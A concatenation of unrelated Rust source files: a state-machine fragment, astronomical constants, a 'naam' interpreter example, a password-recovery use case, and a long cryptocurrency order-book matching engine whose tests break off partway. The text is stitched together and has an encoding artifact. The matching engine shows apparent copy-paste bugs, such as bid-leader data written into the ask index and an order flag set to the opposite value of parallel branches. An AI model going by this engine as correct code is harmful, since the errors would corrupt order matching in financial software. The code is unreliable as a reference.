if fs == ¤t { return true; }
}
}
}
false
}
pub fn current_state(&mut self) -> String{
match self.current_state{
Some(ref x) => x.clone(),
None => "".to_string(),
}
}
pub fn is_finished(&mut self) -> bool{
match self.current_state{
Some(ref cs) => {
match self.final_state{
Some(ref fs) => {
if cs.as_slice() == "" { false }
else if cs == fs { true }
else { false }
},
None => false
}
},
None => false
}
}
}
|
/** Pi */
pub const DPI: f64 = 3.141592653589793238462643;
/** 2Pi */
pub const D2PI: f64 = 6.283185307179586476925287;
/** Radians to degrees */
pub const DR2D: f64 = 57.29577951308232087679815;
/** Degrees to radians */
pub const DD2R: f64 = 1.745329251994329576923691e-2;
/** Radians to arcseconds */
pub const DR2AS: f64 = 206264.8062470963551564734;
/** Arcseconds to radians */
pub const DAS2R: f64 = 4.848136811095359935899141e-6;
/** Seconds of time to radians */
pub const DS2R: f64 = 7.272205216643039903848712e-5;
/** Arcseconds in a full circle */
pub const TURNAS: f64 = 1296000.0;
/** Milliarcseconds to radians */
pub const DMAS2R: f64 = DAS2R / 1e3;
/** Length of tropical year B1900 (days) */
pub const DTY: f64 = 365.242198781;
/** Seconds per day. */
pub const DAYSEC: f64 = 86400.0;
/** Days per Julian year */
pub const DJY: f64 = 365.25;
/** Days per Julian century */
pub const DJC: f64 = 36525.0;
/** Days per Julian millennium */
pub const DJM: f64 = 365250.0;
/** Reference epoch (J2000.0), Julian Date */
pub const DJ00: f64 = 2451545.0;
/** Julian Date of Modified Julian Date zero */
pub const DJM0: f64 = 2400000.5;
/** Reference epoch (J2000.0), Modified Julian Date */
pub const DJM00: f64 = 51544.5;
/** 1977 Jan 1.0 as MJD */
pub const DJM77: f64 = 43144.0;
/** TT minus TAI (s) */
pub const TTMTAI: f64 = 32.184;
/** Astronomical unit (m, IAU 2012) */
pub const DAU: f64 = 149597870.7e3;
/** Speed of light (m/s) */
pub const CMPS: f64 = 299792458.0;
/** Light time for 1 au (s) */
pub const AULT: f64 = DAU / CMPS;
/** Speed of light (au per day) */
pub const DC: f64 = DAYSEC / AULT;
/** L_G = 1 - d(TT)/d(TCG) */
pub const ELG: f64 = 6.969290134e-10;
/** L_B = 1 - d(TDB)/d(TCB), and TDB (s) at TAI 1977/1/1.0 */
pub const ELB: f64 = 1.550519768e-8;
pub const TDB0: f64 = -6.55e-5;
/** Schwarzschild radius of the Sun (au) */
/** = 2 * 1.32712440041e20 / (2.99792458e8)^2 / 1.49597870700e11 */
pub const SRS: f64 = 1.97412574336e-8;
/* Reference ellipsoids */
pub const WGS84: std::os::raw::c_int = 1;
pub const GRS80: std::os::raw::c_int = 2;
pub const WGS72: std::os::raw::c_int = 3;
|
pub mod AI;
pub mod heuristics;
pub mod tree; |
#![forbid(unsafe_code)]
extern crate naam;
use naam::builder::{Build, Builder};
use naam::builtins::Nop;
use naam::cpu::DirectThreadedLoop as Cpu;
use naam::debug_info::Dump;
use naam::tape::UnexpectedEndError;
use naam::{Destination, Execute, Offset, Pc, Program, Runner};
use std::fmt::Debug;
fn main() {
let hello = "Hello, world!".to_owned();
let code = SayItNTimes(&hello);
let program = Program::new(Cpu, vec![], &code).unwrap();
println!("{:#?}\n", program);
let mut ram = SayItNTimesRam {
rval: 0,
counter: 2,
};
program.run(&mut ram);
assert!(ram.rval == 42);
}
#[derive(Debug)]
struct SayItNTimes<'a>(&'a str);
impl<'a> Build<Cpu> for SayItNTimes<'a> {
type Ram = SayItNTimesRam;
type Error = UnexpectedEndError;
fn build<'tape, 'code>(
&'code self,
builder: &mut Builder<'tape, 'code, Cpu, SayItNTimesRam>,
) -> Result<(), Self::Error>
where
'code: 'tape,
{
builder.emit(Nop)?;
let print_hello_world = builder.offset();
builder.emit(PrintLn(self.0))?;
builder.emit(JumpNTimes(print_hello_world))?;
builder.emit(Return(42))
}
}
#[derive(Clone, Copy, Debug)]
struct SayItNTimesRam {
rval: usize,
counter: usize,
}
#[derive(Clone, Copy, Debug, Dump)]
struct Return(usize);
impl<'tape> Execute<'tape, SayItNTimesRam> for Return {
fn execute(
pc: Pc<'tape, Self>,
runner: Runner<'tape>,
ram: &mut SayItNTimesRam,
) -> Destination<'tape> {
ram.rval = pc.0;
Err(runner.halt())
}
}
#[derive(Clone, Copy, Debug, Dump)]
#[repr(transparent)]
struct PrintLn<'code>(&'code str);
impl<'tape, 'code: 'tape, Ram> Execute<'tape, Ram> for PrintLn<'code>
where
Ram: ?Sized,
{
#[inline(always)]
fn execute(pc: Pc<'tape, Self>, _runner: Runner<'tape>, _ram: &mut Ram) -> Destination<'tape> {
println!("{}", pc.0);
Ok(pc.next())
}
}
#[derive(Clone, Copy, Dump)]
#[repr(transparent)]
struct JumpNTimes<'tape>(Offset<'tape>);
impl<'tape, 'code> Execute<'tape, SayItNTimesRam> for JumpNTimes<'tape> {
fn execute(
pc: Pc<'tape, Self>,
runner: Runner<'tape>,
ram: &mut SayItNTimesRam,
) -> Destination<'tape> {
Ok(if ram.counter > 0 {
ram.counter -= 1;
runner.resolve_offset(pc.0)
} else {
pc.next()
})
}
}
|
use serde::Deserialize;
use uuid::Uuid;
use common::event::EventPublisher;
use common::result::Result;
use crate::domain::user::{Email, Password, UserRepository, UserService};
#[derive(Deserialize)]
pub struct RecoverPasswordCommand {
pub email: String,
}
pub struct RecoverPassword<'a> {
event_pub: &'a dyn EventPublisher,
user_repo: &'a dyn UserRepository,
user_serv: &'a UserService,
}
impl<'a> RecoverPassword<'a> {
pub fn new(
event_pub: &'a dyn EventPublisher,
user_repo: &'a dyn UserRepository,
user_serv: &'a UserService,
) -> Self {
RecoverPassword {
user_repo,
user_serv,
event_pub,
}
}
pub async fn exec(&self, cmd: RecoverPasswordCommand) -> Result<()> {
let email = Email::new(cmd.email)?;
let mut user = self.user_repo.find_by_email(&email).await?;
let tmp_password = Uuid::new_v4().to_string();
let hashed_password = self.user_serv.generate_password(&tmp_password)?;
let password = Password::new(hashed_password)?;
user.recover_password(password, &tmp_password)?;
self.user_repo.save(&mut user).await?;
self.event_pub.publish_all(user.base().events()?).await?;
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::mocks;
#[tokio::test]
async fn non_existing_user() {
let c = mocks::container();
let uc = RecoverPassword::new(c.event_pub(), c.user_repo(), c.user_serv());
let user = mocks::user1();
assert!(uc
.exec(RecoverPasswordCommand {
email: user.identity().email().to_string(),
})
.await
.is_err())
}
#[tokio::test]
async fn password_recovery_code_generated() {
let c = mocks::container();
let uc = RecoverPassword::new(c.event_pub(), c.user_repo(), c.user_serv());
let mut user = mocks::user1();
let old_password = user.identity().password().unwrap().to_string();
c.user_repo().save(&mut user).await.unwrap();
assert!(uc
.exec(RecoverPasswordCommand {
email: user.identity().email().to_string(),
})
.await
.is_ok());
let user = c.user_repo().find_by_id(&user.base().id()).await.unwrap();
assert_ne!(user.identity().password().unwrap().value(), old_password);
assert_eq!(c.event_pub().events().await.len(), 1);
}
}
|
#![feature(map_first_last)]
use chrono::offset::LocalResult;
use chrono::prelude::*;
use common::bitmap::BitMap;
use crossbeam_channel::unbounded;
use libc::fsync;
use order::proto::{OrderInfo, OrderOp, OrderSide, OrderStatus};
use rust_decimal::prelude::*;
use rust_decimal::Decimal;
use rust_decimal_macros::*;
use serde::{Deserialize, Serialize};
use serde_json::Result;
use std::collections::BTreeMap;
use std::fs::File;
use std::io::prelude::*;
use std::os::unix::io::AsRawFd;
use std::thread;
#[macro_use]
extern crate smart_default;
#[derive(Copy, Clone, Default, Debug, Serialize, Deserialize)]
struct PriceNode {
qty: Decimal, // curr node order qty
price: Decimal, // curr node price
order_slot: usize, // curr node order number
last_slot: usize, // last order slot
}
#[derive(Copy, Clone, Debug, PartialEq, SmartDefault, Serialize, Deserialize)]
pub enum Signal {
#[default]
Closed,
CancelAllOrder,
}
#[derive(Debug, Serialize, Deserialize)]
pub struct OrderBook {
market: String, // curr orderbook market ID
bid_leader: PriceNode, // the best buy price_node
ask_leader: PriceNode, // the best sell price_node
orders: Vec<OrderInfo>, // store order array
order_bitmap: BitMap, // bitmap index of order
bid_price_index: BTreeMap<Decimal, PriceNode>, // price_node of buy skiplist index
ask_price_index: BTreeMap<Decimal, PriceNode>, // price_node of sell skiplist index
// #[serde(skip_serializing)]
// order_chan: Receiver<Result<OrderInfo>>,
}
pub enum Msg {
SimpleOrder(OrderInfo), // new order
CancelOrder((u64, u64, Decimal)), // cancel order operation
CancelAllOrder, // cancel all order
Snapshot, // start snapshot signal
}
impl OrderBook {
pub fn new(max_order_num: usize, market: String) -> OrderBook {
//{{{
let orders: Vec<OrderInfo> = vec![OrderInfo::default(); max_order_num];
OrderBook {
market: market,
bid_leader: Default::default(),
ask_leader: Default::default(),
orders: orders,
order_bitmap: BitMap::new(max_order_num),
bid_price_index: BTreeMap::new(),
ask_price_index: BTreeMap::new(),
}
} //}}}
pub fn run(self, recv: crossbeam_channel::Receiver<Msg>) {
//{{{
thread::spawn(move || loop {
match recv.recv() {
Ok(msg) => match msg {
Msg::SimpleOrder(o) => {
println!("{:?}", o);
}
Msg::CancelOrder((order_id, uid, price)) => {
println!("{}->{}->{}", order_id, uid, price);
}
Msg::Snapshot => self.snapshot(),
Msg::CancelAllOrder => {}
},
Err(err) => println!("{:?}", err),
}
})
.join()
.unwrap();
return;
} //}}}
// orderbook match entry
pub fn match_entry(&mut self, order: &mut OrderInfo) {
//{{{
match order.op {
OrderOp::Limit => self.limit_match(order),
OrderOp::Market => self.market_match(order),
OrderOp::Cancel => {
self.cancel(order);
}
}
} //}}}
/// limit price match
/// If there are remainning parts after the order is matched. match engine will insert this part into the order book
fn limit_match(&mut self, taker: &mut OrderInfo) {
//{{{
assert_eq!(taker.op, OrderOp::Limit);
match taker.side {
OrderSide::Ask => {
//{{{
// there is no suitable bid order
if self.bid_leader.qty.is_zero()
|| self.bid_leader.price.is_zero()
|| self.bid_leader.price < taker.price
{
self.insert_order(taker);
return;
}
self.bid_leader.qty -= taker.remain_qty;
if !self.bid_leader.qty.is_zero() && self.bid_leader.qty.is_sign_positive() {
// After match. bid leader still remain qty
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.bid_leader.order_slot;
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
let record = self.orders[maker_slot].trade(taker).unwrap();
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
self.bid_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
// replace price node index
self.bid_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key: Decimal = dec!(0);
loop {
//{{{
if !remove_node_key.is_zero() {
self.bid_price_index.remove(&remove_node_key);
remove_node_key = dec!(0);
}
if taker.remain_qty.is_zero() {
break;
}
match self.bid_price_index.last_entry() {
Some(mut entry) => {
let price = *entry.key();
if price < taker.price {
if taker.remain_qty.is_sign_positive() {
self.insert_order(taker);
return;
}
}
let node = entry.get_mut();
node.qty -= taker.remain_qty;
if node.qty.is_zero() || !node.qty.is_sign_positive() {
remove_node_key = node.price;
}
let mut order_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
order_slot = node.order_slot;
if order_slot == 0 {
break;
}
assert_eq!(self.orders[order_slot].logic.used, true);
if self.orders[order_slot].remain_qty > taker.remain_qty {
self.orders[order_slot].trade(taker);
break;
} else {
self.orders[order_slot].logic.used = false;
self.order_bitmap.clear(&order_slot);
self.orders[order_slot].trade(taker);
let next = self.orders[order_slot].logic.next_slot;
if next != 0 || order_slot == next {
node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
}
None => {
if !taker.remain_qty.is_zero()
&& taker.remain_qty.is_sign_positive()
{
self.insert_order(taker);
}
return;
}
}
} //}}}
match self.bid_price_index.last_key_value() {
Some((_, price_node)) => self.bid_leader = *price_node,
None => self.bid_leader = PriceNode::default(),
}
}
} //}}}
OrderSide::Bid => {
//{{{
if self.ask_leader.qty.is_zero()
|| self.ask_leader.price.is_zero()
|| self.ask_leader.price > taker.price
{
self.insert_order(taker);
return;
}
self.ask_leader.qty -= taker.remain_qty;
if !self.ask_leader.qty.is_zero() && self.ask_leader.qty.is_sign_positive() {
// After match . ask leader still remain qty
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.ask_leader.order_slot;
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
self.orders[maker_slot].trade(taker);
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
assert!(next != 0);
self.ask_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
self.ask_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key: Decimal = dec!(0);
loop {
if !remove_node_key.is_zero() {
self.ask_price_index.remove(&remove_node_key);
}
if taker.remain_qty.is_zero() {
break;
}
match self.ask_price_index.first_entry() {
Some(mut entry) => {
let price = *entry.key();
let node = entry.get_mut();
if price > taker.price {
//{{{
if taker.remain_qty.is_sign_positive() {
self.insert_order(taker);
break;
}
} //}}}
node.qty -= taker.remain_qty;
if node.qty.is_zero() || !node.qty.is_sign_positive() {
remove_node_key = node.price;
}
let mut order_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
order_slot = node.order_slot;
if order_slot == 0 {
break;
}
assert_eq!(self.orders[order_slot].logic.used, true);
if self.orders[order_slot].remain_qty > taker.remain_qty {
self.orders[order_slot].trade(taker);
} else {
self.orders[order_slot].logic.used = false;
self.order_bitmap.clear(&order_slot);
self.orders[order_slot].trade(taker);
let next = self.orders[order_slot].logic.next_slot;
if next != 0 || next == order_slot {
node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
}
None => {
if !taker.remain_qty.is_zero()
&& taker.remain_qty.is_sign_positive()
{
self.insert_order(taker);
}
}
}
}
}
}
} //}}}
} //}}}
/// market price match
/// When the order is market type they will not be write into the order book.
/// If there are remainning parts after the order is matched. match engine will reject this parts and gennerate a trade reocrd for this parts
fn market_match(&mut self, taker: &mut OrderInfo) {
assert_eq!(taker.op, OrderOp::Market);
match taker.side {
OrderSide::Ask => {
//{{{
if self.bid_leader.qty.is_zero() || self.bid_leader.price.is_zero() {
// gen new reject trade_record
// TODO:
return;
}
self.bid_leader.qty -= taker.remain_qty;
if !self.bid_leader.qty.is_zero() || self.bid_leader.qty.is_sign_positive() {
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.bid_leader.order_slot;
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
self.bid_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
// update the price node in the index
self.bid_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key = dec!(0);
loop {
if !remove_node_key.is_zero() {
self.bid_price_index.remove(&remove_node_key);
remove_node_key = dec!(0);
}
if taker.remain_qty.is_zero() {
break;
}
match self.bid_price_index.last_entry() {
Some(mut entry) => {
let price = *entry.key();
let node = entry.get_mut();
node.qty -= taker.remain_qty;
if node.qty.is_zero() || !node.qty.is_sign_positive() {
remove_node_key = price;
}
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = node.order_slot;
if maker_slot == 0 {
break;
}
assert_eq!(self.orders[maker_slot].logic.used, true);
if self.orders[maker_slot].remain_qty > taker.remain_qty {
self.orders[maker_slot].trade(taker);
break;
} else {
self.orders[maker_slot].logic.used = true;
self.order_bitmap.clear(&maker_slot);
self.orders[maker_slot].trade(taker);
let next = self.orders[maker_slot].logic.next_slot;
if next != 0 || maker_slot == next {
node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
match self.bid_price_index.last_key_value() {
Some((_, price_node)) => self.bid_leader = *price_node,
None => self.bid_leader = PriceNode::default(),
}
}
None => {
if !taker.remain_qty.is_zero() {
// TODO:
// reject taker remain qty
}
}
}
}
}
} //}}}
OrderSide::Bid => {
//{{{
if self.ask_leader.qty.is_zero() || self.ask_leader.price.is_zero() {
// TODO: reject this market order. because there is no suitable ask order.
return;
}
self.ask_leader.qty = taker.remain_qty / self.ask_leader.price;
if !self.ask_leader.qty.is_zero() && self.ask_leader.qty.is_sign_positive() {
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = self.ask_leader.order_slot;
if self.orders[maker_slot].remain_qty
> taker.remain_qty / self.ask_leader.price
{
self.orders[maker_slot].trade(taker);
break;
} else {
self.orders[maker_slot].trade(taker);
self.order_bitmap.clear(&maker_slot);
let next = self.orders[maker_slot].logic.next_slot;
assert!(next != 0);
self.ask_leader.order_slot = next;
self.orders[next].logic.pre_slot = 0;
}
}
self.ask_price_index
.insert(self.bid_leader.price, self.bid_leader.clone());
} else {
let mut remove_node_key: Decimal = dec!(0);
loop {
if !remove_node_key.is_zero() {
self.ask_price_index.remove(&remove_node_key);
}
if taker.remain_qty.is_zero() {
break;
}
match self.ask_price_index.first_entry() {
Some(mut entry) => {
let price = *entry.key();
let price_node = entry.get_mut();
price_node.qty -= taker.remain_qty / price;
if price_node.qty.is_zero() || !price_node.qty.is_sign_positive() {
remove_node_key = price;
}
let mut maker_slot: usize;
loop {
if taker.remain_qty.is_zero() {
break;
}
maker_slot = price_node.order_slot;
if maker_slot == 0 {
break;
}
assert_eq!(self.orders[maker_slot].logic.used, true);
if self.orders[maker_slot].remain_qty > taker.remain_qty / price
{
self.orders[maker_slot].trade(taker);
} else {
self.orders[maker_slot].logic.used = false;
self.order_bitmap.clear(&maker_slot);
self.orders[maker_slot].trade(taker);
let next = self.orders[maker_slot].logic.next_slot;
if next != 0 || next == maker_slot {
price_node.order_slot = next;
self.orders[next].logic.pre_slot = 0;
} else {
break;
}
}
}
}
None => {
if !taker.remain_qty.is_zero() {
// TODO: reject remain part
return;
}
}
}
}
}
} //}}}
}
}
// cancel order
fn cancel(&mut self, order: &mut OrderInfo) -> Option<OrderInfo> {
//{{{
assert!(order.op == OrderOp::Cancel);
match order.side {
OrderSide::Ask => match self.ask_price_index.get_mut(&order.price) {
//{{{
Some(mut price_node) => {
let mut order_slot = price_node.order_slot;
loop {
if order_slot == 0 {
return None;
}
if self.orders[order_slot].id == order.id {
self.order_bitmap.clear(&order_slot);
self.orders[order_slot].logic.used = false;
// fix the price node
let order = self.orders[order_slot];
price_node.qty -= order.remain_qty;
// order.logic.used = false;
if order.logic.pre_slot == 0 && order.logic.next_slot == 0 {
// remove this price node
self.ask_price_index.remove(&order.price);
if self.ask_leader.price == order.price {
// update ask leader info
match self.ask_price_index.first_key_value() {
Some((_, price_node)) => {
self.ask_leader = *price_node;
}
None => {
self.ask_leader = PriceNode::default();
}
}
}
return None;
}
if order.logic.pre_slot == 0 {
let next_slot = order.logic.next_slot;
price_node.order_slot = next_slot;
self.orders[next_slot].logic.pre_slot = 0usize;
return None;
}
//
self.orders[order.logic.pre_slot].logic.next_slot =
order.logic.next_slot;
if order.logic.next_slot != 0 {
self.orders[order.logic.next_slot].logic.pre_slot =
order.logic.pre_slot;
}
return Some(self.orders[order_slot].clone());
}
order_slot = self.orders[order_slot].logic.next_slot;
}
}
None => {
return None;
}
}, //}}}
OrderSide::Bid => match self.bid_price_index.get_mut(&order.price) {
//{{{
Some(mut price_node) => {
//{{{
let mut order_slot = price_node.order_slot;
loop {
if order_slot == 0 {
return None;
}
if self.orders[order_slot].id == order.id {
self.order_bitmap.clear(&order_slot);
self.orders[order_slot].logic.used = false;
// fix the price node
let order = self.orders[order_slot];
price_node.qty -= order.remain_qty;
// order.logic.used = false;
if order.logic.pre_slot == 0 && order.logic.next_slot == 0 {
// remove this price node
self.bid_price_index.remove(&order.price);
// update bid leader price node
if self.bid_leader.price == order.price {
match self.bid_price_index.last_key_value() {
Some((_, price_node)) => {
self.bid_leader = *price_node;
}
None => {
self.bid_leader = PriceNode::default();
}
}
}
return None;
}
if order.logic.pre_slot == 0 {
let next_slot = order.logic.next_slot;
price_node.order_slot = next_slot;
self.orders[next_slot].logic.pre_slot = 0usize;
return None;
}
//
self.orders[order.logic.pre_slot].logic.next_slot =
order.logic.next_slot;
if order.logic.next_slot != 0 {
self.orders[order.logic.next_slot].logic.pre_slot =
order.logic.pre_slot;
}
return Some(self.orders[order_slot].clone());
}
order_slot = self.orders[order_slot].logic.next_slot;
}
} //}}}
None => {
return None;
}
}, //}}}
}
} //}}}
// There is no suitable price order, Insert this order into orderbook
fn insert_order(&mut self, order: &mut OrderInfo) {
//{{{
assert!(order.op == OrderOp::Limit);
let slot = self.order_bitmap.find_unset();
let price = order.price;
match order.side {
OrderSide::Ask => {
//{{{
match self.ask_price_index.get_mut(&price) {
Some(mut price_node) => {
// price node already exist
price_node.qty += order.remain_qty;
let last_slot = price_node.last_slot;
order.logic.curr_slot = slot;
order.logic.pre_slot = last_slot;
order.logic.next_slot = 0usize;
order.logic.used = true;
self.orders[last_slot].logic.next_slot = slot;
price_node.last_slot = slot;
if self.ask_leader.price == order.price {
self.ask_leader.last_slot = slot;
self.ask_leader.qty += order.remain_qty;
}
}
None => {
// price node does not exist
let new_node = PriceNode {
qty: order.remain_qty,
price: order.price,
order_slot: slot,
last_slot: slot,
};
order.logic.curr_slot = slot;
order.logic.pre_slot = 0usize;
order.logic.next_slot = 0usize;
order.logic.used = true;
if self.ask_leader.price > order.price || self.ask_leader.price.is_zero() {
self.ask_leader.price = order.price;
self.ask_leader.qty = order.remain_qty;
self.ask_leader.order_slot = slot;
self.ask_leader.last_slot = slot;
}
self.ask_price_index.insert(order.price, new_node);
}
}
} //}}}
OrderSide::Bid => {
//{{{
match self.bid_price_index.get_mut(&price) {
Some(mut price_node) => {
// price node already exist
price_node.qty += order.remain_qty;
let last_slot = price_node.last_slot;
order.logic.curr_slot = slot;
order.logic.pre_slot = last_slot;
order.logic.next_slot = 0usize;
order.logic.used = true;
self.orders[last_slot].logic.next_slot = slot;
price_node.last_slot = slot;
if order.price == self.bid_leader.price {
self.bid_leader.qty += order.remain_qty;
self.bid_leader.last_slot = slot;
}
}
None => {
// price node does not existc
let new_node = PriceNode {
qty: order.remain_qty,
price: order.price,
order_slot: slot,
last_slot: slot,
};
order.logic.curr_slot = slot;
order.logic.pre_slot = 0usize;
order.logic.next_slot = 0usize;
order.logic.used = true;
if self.bid_leader.price < order.price {
self.bid_leader.price = order.price;
self.bid_leader.qty = order.remain_qty;
self.bid_leader.order_slot = slot;
self.bid_leader.last_slot = slot;
}
self.bid_price_index.insert(order.price, new_node);
}
}
} //}}}
}
self.orders[slot] = *order;
} //}}}
fn snapshot(&self) {
//{{{
let json = serde_json::to_string(self).unwrap();
let dump_file_name = Utc::now().format("%Y-%m-%d_").to_string() + &self.market + ".d";
println!("{}", dump_file_name);
let mut file = File::create("batch/".to_owned() + &dump_file_name).unwrap();
file.write_all(json.as_bytes()).unwrap();
unsafe {
fsync(file.as_raw_fd());
}
} //}}}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn order_book_init_insert_test() {
//{{{
let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
let mut test_order = OrderInfo::default();
test_order.price = dec!(1.2);
test_order.id = 1;
test_order.raw_qty = dec!(100);
test_order.remain_qty = dec!(100);
orderbook.insert_order(&mut test_order);
assert_eq!(orderbook.bid_leader.qty, dec!(100));
test_order.id = 2;
orderbook.insert_order(&mut test_order);
assert_eq!(orderbook.bid_leader.qty, dec!(200));
test_order.id = 3;
orderbook.insert_order(&mut test_order);
assert_eq!(orderbook.bid_leader.qty, dec!(300));
assert_eq!(orderbook.orders[1].logic.curr_slot, 1);
assert_eq!(orderbook.orders[1].logic.pre_slot, 0);
assert_eq!(orderbook.orders[1].logic.next_slot, 2);
assert_eq!(orderbook.orders[2].logic.curr_slot, 2);
assert_eq!(orderbook.orders[2].logic.pre_slot, 1);
assert_eq!(orderbook.orders[2].logic.next_slot, 3);
assert_eq!(orderbook.orders[3].logic.curr_slot, 3);
assert_eq!(orderbook.orders[3].logic.pre_slot, 2);
assert_eq!(orderbook.orders[3].logic.next_slot, 0);
for (k, v) in orderbook.bid_price_index.iter() {
println!("{}-> {:?}", k, v);
}
let price_node = orderbook.bid_price_index.get(&test_order.price).unwrap();
println!("{:?}", price_node);
} //}}}
#[test]
fn order_book_cancel_test() {
//{{{
let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
let mut test_order = OrderInfo::default();
test_order.id = 1;
test_order.price = dec!(1.23);
test_order.raw_qty = dec!(100);
test_order.remain_qty = dec!(100);
orderbook.insert_order(&mut test_order);
test_order.id = 2;
orderbook.insert_order(&mut test_order);
test_order.id = 3;
orderbook.insert_order(&mut test_order);
test_order.id = 2;
test_order.op = OrderOp::Cancel;
orderbook.cancel(&mut test_order);
let price_node = orderbook.bid_price_index.get(&test_order.price).unwrap();
assert_eq!(price_node.qty, dec!(200));
assert_eq!(price_node.order_slot, 1usize);
assert_eq!(price_node.last_slot, 3usize);
assert_eq!(orderbook.orders[2].logic.used, false);
test_order.op = OrderOp::Limit;
test_order.side = OrderSide::Ask;
test_order.id = 4;
test_order.price = dec!(1.25);
orderbook.insert_order(&mut test_order);
test_order.id = 5;
orderbook.insert_order(&mut test_order);
test_order.id = 6;
orderbook.insert_order(&mut test_order);
test_order.id = 5;
test_order.op = OrderOp::Cancel;
orderbook.cancel(&mut test_order);
assert_eq!(orderbook.orders[2].logic.curr_slot, 2);
assert_eq!(orderbook.orders[2].logic.pre_slot, 0);
assert_eq!(orderbook.orders[2].logic.next_slot, 5);
assert_eq!(orderbook.orders[4].logic.curr_slot, 4);
assert_eq!(orderbook.orders[4].logic.pre_slot, 2);
assert_eq!(orderbook.orders[4].logic.next_slot, 5);
assert_eq!(orderbook.orders[5].logic.curr_slot, 5);
assert_eq!(orderbook.orders[5].logic.pre_slot, 2);
assert_eq!(orderbook.orders[5].logic.next_slot, 0);
let price_node = orderbook.ask_price_index.get(&test_order.price).unwrap();
assert_eq!(price_node.qty, dec!(200));
assert_eq!(price_node.order_slot, 2);
assert_eq!(price_node.last_slot, 5);
} //}}}
#[test]
fn order_bool_limit_match_test_bid_taker() {
//{{{
let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
let mut test_order = OrderInfo::default();
test_order.id = 1;
test_order.price = dec!(1.23);
test_order.raw_qty = dec!(100);
test_order.remain_qty = dec!(100);
test_order.uid = 10001;
orderbook.insert_order(&mut test_order.clone());
let node = orderbook.bid_price_index.get(&dec!(1.23)).unwrap();
assert_eq!(node.qty, dec!(100));
assert_eq!(node.price, dec!(1.23));
assert_eq!(node.order_slot, 1usize);
assert_eq!(node.last_slot, 1usize);
test_order.price = dec!(1.24);
test_order.uid = 10002;
test_order.id = 2;
orderbook.insert_order(&mut test_order.clone());
let node = orderbook.bid_price_index.get(&dec!(1.24)).unwrap();
assert_eq!(node.qty, dec!(100));
assert_eq!(node.price, dec!(1.24));
assert_eq!(node.order_slot, 2usize);
assert_eq!(node.last_slot, 2usize);
test_order.price = dec!(1.25);
test_order.uid = 10003;
test_order.id = 3;
orderbook.insert_order(&mut test_order.clone());
let node = orderbook.bid_price_index.get(&dec!(1.25)).unwrap();
assert_eq!(node.qty, dec!(100));
assert_eq!(node.price, dec!(1.25));
assert_eq!(node.order_slot, 3usize);
assert_eq!(node.last_slot, 3usize);
test_order.price = dec!(1.23);
test_order.raw_qty = dec!(250);
test_order.remain_qty = dec!(250);
test_order.uid = 10005;
test_order.side = OrderSide::Ask;
orderbook.match_entry(&mut test_order.clone());
match orderbook.bid_price_index.get(&dec!(1.25)) {
Some(_) => panic!("error"),
None => (),
}
match orderbook.bid_price_index.get(&dec!(1.24)) {
Some(_) => panic!("error"),
None => (),
}
let node = orderbook.bid_price_index.get(&dec!(1.23)).unwrap();
assert_eq!(node.qty, dec!(50));
assert_eq!(node.price, dec!(1.23));
assert_eq!(node.order_slot, 1usize);
assert_eq!(node.last_slot, 1usize);
assert_eq!(orderbook.orders[1].logic.used, true);
assert_eq!(orderbook.orders[2].logic.used, false);
assert_eq!(orderbook.orders[3].logic.used, false);
} //}}}
#[test]
fn order_bool_limit_match_test_ask_taker() {
//{{{
//{{{
let mut orderbook = OrderBook::new(100, "BTC/USDT".to_owned());
let mut test_order = OrderInfo::default();
test_order.side = OrderSide::Ask;
test_order.id = 1;
test_order.price = dec!(1.23);
test_order.raw_qty = dec!(100);
test_order.remain_qty = dec!(100);
test_order.uid = 10001;
orderbook.insert_order(&mut test_order.clone());
let node = orderbook.ask_price_index.get(&dec!(1.23)).unwrap();
assert_eq!(node.qty, dec!(100));
assert_eq!(node.price, dec!(1.23));
assert_eq!(node.order_slot, 1usize);
assert_eq!(node.last_slot, 1usize);
test_order.price = dec!(1.24);
test_order.uid = 10002;
test_order.id = 2;
orderbook.insert_order(&mut test_order.clone());
let node = orderbook.ask_price_index.get(&dec!(1.24)).unwrap();
assert_eq!(node.qty, dec!(100));
assert_eq!(node.price, dec!(1.24));
assert_eq!(node.order_slot, 2usize);
assert_eq!(node.last_slot, 2usize);
test_order.price = dec!(1.25);
test_order.uid = 10003;
test_order.id = 3;
orderbook.insert_order(&mut test_order.clone());
let node = orderbook.ask_price_index.get(&dec!(1.25)).unwrap();
assert_eq!(node.qty, dec!(100));
assert_eq!(node.price, dec!(1.25));
assert_eq!(node.order_slot, 3usize);
assert_eq!(node.last_slot, 3usize);
test_order.price = dec!(1.25);
test_order.raw_qty = dec!(250);
test_order.remain_qty = dec!(250);
